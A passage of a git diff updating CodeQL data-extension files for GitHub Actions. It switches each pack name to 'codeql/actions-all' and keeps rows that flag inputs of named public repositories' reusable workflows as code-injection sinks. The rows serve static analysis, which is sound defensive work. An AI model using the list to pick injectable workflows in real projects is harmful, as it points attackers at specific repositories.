b/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml index 3ec3c008301a..d8e08a8e2bd8 100644 --- a/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["gitpod-io/gitpod/.github/workflows/jetbrains-auto-update-template.yml", "*", "input.productId", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml b/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml index f4c09189ba64..b7478e325a2b 100644 --- a/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["gittools/gitversion/.github/workflows/_artifacts_linux.yml", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml index 46b715358e06..fff04025bc52 100644 --- a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["googlecloudplatform/magic-modules/.github/workflows/build-downstream.yml", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml index ca728bfced25..be5ac94db5c9 100644 --- a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["googlecloudplatform/nodejs-docs-samples/.github/workflows/test.yaml", "*", "input.path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml b/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml index c31b5c8fe0c6..b8633806ac7e 100644 --- a/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["gravitational/teleport/.github/workflows/update-ami-ids.yaml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml b/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml index e53c0a2780b6..8e534e5be923 100644 --- a/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["gravitl/netmaker/.github/workflows/publish-docker.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml b/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml index 2c904674125a..44aa0ea3a928 100644 --- a/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "input.build-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml b/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml index cff10b709e9b..cd17a2ca4a59 100644 --- a/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["hadashia/vcontainer/.github/workflows/update-version-number.yaml", "*", "input.dry-run", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml b/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml index 31e4dbbf7ab6..d96c0c99d0c1 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml", "*", "input.version", "output.docker-image-tag", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml index 5aca8a7070da..f07f5ba54ea7 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["hashicorp/boundary/.github/workflows/test-cli-ui_oss.yml", "*", "input.artifact-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml index 179c882eba19..391108291479 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["hashicorp/consul/.github/workflows/reusable-unit.yml", "*", "input.package-names-command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml index a702bdd47843..196c25e14e95 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["hashicorp/terraform-cdk/.github/workflows/unit.yml", "*", "input.package", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml index 105a5b49f3dd..7a2e2fea0eb9 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["hashicorp/terraform-provider-tfe/.github/workflows/jira-issue-sync.yml", "*", "input.issue-extra-fields", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml index 4e4aa9f79861..d00a80de5d1e 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "input.product-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml index 4272f3376ce1..4f7926a22a68 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "input.sample-max", "code-injection", "generated"] @@ -15,7 +15,7 @@ extensions: - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "input.total-runners", "code-injection", "generated"] - ["hashicorp/vault/.github/workflows/test-enos-scenario-ui.yml", "*", "input.storage_backend", "code-injection", "generated"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["hashicorp/vault/.github/workflows/build-artifacts-ce.yml", "*", "input.vault-version-package", "output.testable-packages", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml index 4752bce29b9f..a0c0b5638dd0 100644 --- a/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["heroku/cli/.github/workflows/publish-npm.yml", "*", "input.isStableRelease", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml b/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml index e493955ca4cd..494c63d62720 100644 --- a/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "input.project_name", "code-injection", "generated"] - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "input.dependency_track_url", "code-injection", "generated"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["hitobito/hitobito/.github/workflows/stage-settings.yml", "*", "input.stage", "output.release_stage", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml b/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml index e3c0040f7dfb..bd855d53f139 100644 --- a/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["home-assistant/operating-system/.github/workflows/test.yaml", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml b/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml index daaa34ab8ab1..f499896a72ff 100644 --- a/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "input.windowsBuildArgs", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml b/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml index 9bfe61804816..66bd5e8b99d7 100644 --- a/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "input.package_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml b/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml index d8cd44f08ee9..fc0d7a48ca31 100644 --- a/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["huggingface/transformers/.github/workflows/slack-report.yml", "*", "input.folder_slices", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml b/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml index 9b1fd73494e7..e3a048ee25cd 100644 --- a/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "input.pull_request_number", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml b/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml index 2fafb1f39b6a..db3fb546f0f6 100644 --- a/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ibm/sarama/.github/workflows/fvt.yml", "*", "input.kafka-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml b/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml index 0f4b87acc625..3a1b8c8403ec 100644 --- a/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["icloud-photos-downloader/icloud_photos_downloader/.github/workflows/build-package.yml", "*", "input.icloudpd_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml b/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml index 4b58c4a27b1b..9f633ceca2a3 100644 --- a/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["immich-app/immich/.github/workflows/build-mobile.yml", "*", "input.ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml b/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml index 36e6df71d47a..96eb05c06992 100644 --- a/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["inria/spoon/.github/workflows/jreleaser.yml", "*", "input.release-script-to-run", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml b/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml index 444291b0c50b..9448aaeabe1b 100644 --- a/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["intel/intel-device-plugins-for-kubernetes/.github/workflows/lib-publish.yaml", "*", "input.image_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml b/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml index ebd11dd18113..d9af00581aa1 100644 --- a/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["inverse-inc/packetfence/.github/workflows/reusable_upload_packages.yml", "*", "input._PACKAGE_NAME", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml b/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml index 3dfd3db12f59..aee71d38351f 100644 --- a/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ispc/ispc/.github/workflows/reusable.rebuild.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml b/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml index a47ce91bf1b0..cb06e03a0b20 100644 --- a/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["jetbrains/intellij-platform-gradle-plugin/.github/workflows/reusable-single-unitTest.yml", "*", "input.gradleVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml b/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml index f4114b0a3960..837ac52856bb 100644 --- a/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "input.image", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml b/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml index a5b367ab3557..737350d2379e 100644 --- a/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kairos-io/kairos/.github/workflows/reusable-zfs-test.yaml", "*", "input.flavor", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml b/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml index 5aab353540a0..3fd4d6157783 100644 --- a/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kanidm/kanidm/.github/workflows/kanidm_individual_book.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml b/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml index db6b7c28c514..caf13251f20f 100644 --- a/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kata-containers/kata-containers/.github/workflows/release-s390x.yaml", "*", "input.target-arch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml b/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml index bd2ceb9eeb16..2f8790197e1a 100644 --- a/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "input.build_mode", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml b/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml index d52fc08b2fe0..f51482fc02e4 100644 --- a/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kotest/kotest/.github/workflows/run-gradle.yml", "*", "input.task", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml b/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml index 8a664d1bc87b..67b335536ac9 100644 --- a/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kubernetes/ingress-nginx/.github/workflows/zz-tmpl-k8s-e2e.yaml", "*", "input.k8s-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml b/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml index bbfe6cfc5015..514fbac1d52f 100644 --- a/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "input.image_tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml b/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml index 75bbf328d641..6a578723d865 100644 --- a/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.next-version", "code-injection", "generated"] - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.release-branch", "code-injection", "generated"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.next-version", "output.new-version", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml b/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml index 6cd55f46f646..14afd31d1524 100644 --- a/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kumahq/kuma/.github/workflows/_build_publish.yaml", "*", "input.VERSION_NAME", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml b/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml index 4c85243e4155..772dd2e7c713 100644 --- a/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["labring/sealos/.github/workflows/services.yml", "*", "input.push_image_tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml b/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml index fd1c5ae41497..477e782dde65 100644 --- a/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["laion-ai/open-assistant/.github/workflows/docker-build.yaml", "*", "input.context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml b/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml index d848e7587ca3..4d66b2854034 100644 --- a/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["learningequality/kolibri/.github/workflows/upload_github_release_asset.yml", "*", "input.release_id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml b/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml index e2e3fa8f5936..8bd5aacbd9b0 100644 --- a/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["lensesio/stream-reactor/.github/workflows/build.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml b/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml index 69d627bdc7fb..cd1933d8a235 100644 --- a/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["leptos-rs/leptos/.github/workflows/run-cargo-make-task.yml", "*", "input.directory", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml b/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml index 11687fa31b63..9e1b26e1a293 100644 --- a/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["lightning-ai/pytorch-lightning/.github/workflows/_legacy-checkpoints.yml", "*", "input.push_to_s3", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml b/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml index 3d3947515997..4977c1d98817 100644 --- a/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["liquibase/liquibase/.github/workflows/build-azure-uber-jar.yml", "*", "input.liquibase-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml b/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml index 2fb4ca827636..2fa4322aff4c 100644 --- a/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["litestar-org/litestar/.github/workflows/test.yml", "*", "input.python-version", "code-injection", "generated"] diff --git 